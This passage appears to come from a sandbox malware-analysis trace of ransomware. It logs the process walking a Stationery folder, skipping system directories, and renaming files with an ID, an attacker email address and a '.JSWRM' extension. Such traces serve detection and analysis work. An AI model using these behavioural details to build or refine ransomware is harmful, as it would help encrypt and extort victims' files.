Size=0x90) returned 0x23b400 [0068.898] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0068.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.898] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.898] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.899] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10049536280073920) returned 0 [0068.899] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.899] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.899] CloseHandle (hObject=0xffffffff) returned 1 [0068.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0068.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0068.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0068.899] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0068.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0068.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.899] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Soft Blue.htm.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0068.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.899] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.899] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2949, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="SoftBlue.jpg", cAlternateFileName="")) returned 1 [0068.899] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2=".") returned 1 [0068.899] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="..") returned 1 [0068.899] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="...") returned 1 [0068.899] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="windows") returned -1 [0068.900] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="recovery") returned 1 [0068.900] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="perflogs") returned 1 [0068.900] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="documents and settings") returned 1 [0068.900] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="$RECYCLE.BIN") returned 1 [0068.900] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="system volume information") returned -1 [0068.900] lstrcmpiW (lpString1="SoftBlue.jpg", lpString2="msocache") returned 1 [0068.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0068.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SoftBlue.jpg", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SoftBlue.jpg", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SoftBlue.jpg", lpUsedDefaultChar=0x0) returned 12 [0068.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0068.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0068.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SoftBlue.jpg", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SoftBlue.jpg", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SoftBlue.jpg", lpUsedDefaultChar=0x0) returned 12 [0068.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0068.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.900] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.900] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.900] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.900] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.901] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9454425611678720) returned 0 [0068.901] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.901] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.901] CloseHandle (hObject=0xffffffff) returned 1 [0068.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0068.901] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0068.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0068.901] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0068.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0068.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.901] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\SoftBlue.jpg.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0068.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.901] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.901] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xe6, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Stars.htm", cAlternateFileName="")) returned 1 [0068.902] lstrcmpiW (lpString1="Stars.htm", lpString2=".") returned 1 [0068.902] lstrcmpiW (lpString1="Stars.htm", lpString2="..") returned 1 [0068.902] lstrcmpiW (lpString1="Stars.htm", lpString2="...") returned 1 [0068.902] lstrcmpiW (lpString1="Stars.htm", lpString2="windows") returned -1 [0068.902] lstrcmpiW (lpString1="Stars.htm", lpString2="recovery") returned 1 [0068.902] lstrcmpiW (lpString1="Stars.htm", lpString2="perflogs") returned 1 [0068.902] lstrcmpiW (lpString1="Stars.htm", lpString2="documents and settings") returned 1 [0068.902] lstrcmpiW (lpString1="Stars.htm", lpString2="$RECYCLE.BIN") returned 1 [0068.902] lstrcmpiW (lpString1="Stars.htm", lpString2="system volume information") returned -1 [0068.902] lstrcmpiW (lpString1="Stars.htm", lpString2="msocache") returned 1 [0068.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.htm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.htm", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Stars.htm", lpUsedDefaultChar=0x0) returned 9 [0068.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0068.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.htm", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.htm", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Stars.htm", lpUsedDefaultChar=0x0) returned 9 [0068.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0068.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.902] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.902] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.902] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.902] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.903] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10049536280073920) returned 0 [0068.903] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.903] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.903] CloseHandle (hObject=0xffffffff) returned 1 [0068.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0068.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0068.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0068.903] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0068.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0068.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.903] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.htm.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 0 [0068.903] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0068.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.904] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x96d8079e, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x96d8079e, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x96d8079e, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1d51, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="Stars.jpg", cAlternateFileName="")) returned 1 [0068.904] lstrcmpiW (lpString1="Stars.jpg", lpString2=".") returned 1 [0068.904] lstrcmpiW (lpString1="Stars.jpg", lpString2="..") returned 1 [0068.904] lstrcmpiW (lpString1="Stars.jpg", lpString2="...") returned 1 [0068.904] lstrcmpiW (lpString1="Stars.jpg", lpString2="windows") returned -1 [0068.904] lstrcmpiW (lpString1="Stars.jpg", lpString2="recovery") returned 1 [0068.904] lstrcmpiW (lpString1="Stars.jpg", lpString2="perflogs") returned 1 [0068.904] lstrcmpiW (lpString1="Stars.jpg", lpString2="documents and settings") returned 1 [0068.904] lstrcmpiW (lpString1="Stars.jpg", lpString2="$RECYCLE.BIN") returned 1 [0068.904] lstrcmpiW (lpString1="Stars.jpg", lpString2="system volume information") returned -1 [0068.904] lstrcmpiW (lpString1="Stars.jpg", lpString2="msocache") returned 1 [0068.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0068.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.jpg", cchWideChar=9, lpMultiByteStr=0x345ef40, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Stars.jpg", lpUsedDefaultChar=0x0) returned 9 [0068.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0068.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0068.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.jpg", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0068.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Stars.jpg", cchWideChar=9, lpMultiByteStr=0x345ef10, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Stars.jpg", lpUsedDefaultChar=0x0) returned 9 [0068.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0068.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.904] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.904] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.904] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0068.917] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9454425611678720) returned 0 [0068.917] SetFilePointer (in: hFile=0xffffffff, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0068.917] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24d1d8 [0068.917] ReadFile (in: hFile=0xffffffff, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8, lpNumberOfBytesRead=0x345ec04*=0x0, lpOverlapped=0x0) returned 0 [0068.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.918] CloseHandle (hObject=0xffffffff) returned 1 [0068.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0068.918] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.918] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0068.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0068.918] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 